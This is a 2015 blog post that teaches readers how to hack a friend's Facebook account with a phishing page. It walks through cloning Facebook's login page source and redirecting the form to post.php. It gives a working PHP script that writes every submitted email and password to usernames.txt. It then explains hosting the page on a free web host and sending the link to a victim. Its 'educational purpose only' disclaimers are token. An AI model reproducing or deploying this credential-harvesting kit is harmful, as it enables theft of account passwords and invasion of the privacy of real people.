Monday, September 7, 2015

Hack facebook Account By Phising page

Hack Facebook Account By Using Phishing Page



      
                                                                           
    As we all want to hack our friend facebook account,and want to read all his/her personal things. 
               Today i m gonna teach you how to hack a facebook account with a phishing page.
                                                          
                                                           **This post is only for educational purpose**  



Steps to create a phishing page:

1. First go to the Facebook page ,and then right click on the page, u will see the option view source page, now click on that.


2. Now simply a new tab will open which contain a huge source code. Select all the stuff and paste it into a notepad.

3.Now open the notepad and press CTRL+F,and type ACTION.


facebook phishing script
                                                  

                                           
4. Here you will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5. Delete all the text written in red colour and instead of it write post.php  Then it will look like...

                                                 action="post.php"

6.Now save it on your desktop with the name index.htm

7.Now your phishing page is ready.it will look like a pic given below . But still many works were left.


hacking script
index

                                                   

8. Again open a new notepad and save the given data with the name post.php.

<?php

header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9.You have two files now one is index.htm and another is post.php, Remember file extension is important.


10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.


11.I prefer u to use 000webhost because it will be easy to use. And it is free of cost :D

                           
hosting website
                                              

12. Here you have to make a account in that site, after that it looks like a picture given below.




facebook script hosting website
                                                                          
13. Now go to control pannel, then go to file manager.

14. After that a new window will pop up.Now go to public_html.



                                           
                                        

15.Delete the file named default.php, after that upload two files index.htm and post.php one by one .




                                        
16.Now the last step click on view of index.htm it will look same as facebook page.



this is your Facebook phishing page
                                         

17. Now your phishing page is ready. Copy the url of that page and send this link to your victim,when your victim try      to login in to it with the username and password .the page redirectly connect to facebook. and you will be now            able to see his password.


18.Open your 000webhost account and go to file manager then public_html,here you find a new file                        named username.txt.

                                


                                        

19.Click on view now u will have your friend's password and email id.



                                           

20.This is a simple trick to hack any Facebook password account by phishing page.


21.If you are not able to create a phishing page then i will provide u a video tutorial link,look

      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.


       Click here to view a video tutorial with the readymade phishing pages....



Note:

As it's a illegal activity so don't try on anyone. So be safe about phishing. Just use it for a educational purpose.

                          Thanks for reading our blog. We will again back with another tricks.
                                                                                                                                         
                                                                                                                                
                                                                                                                                                 

                                                                      
Previous Post
Next Post

0 comments: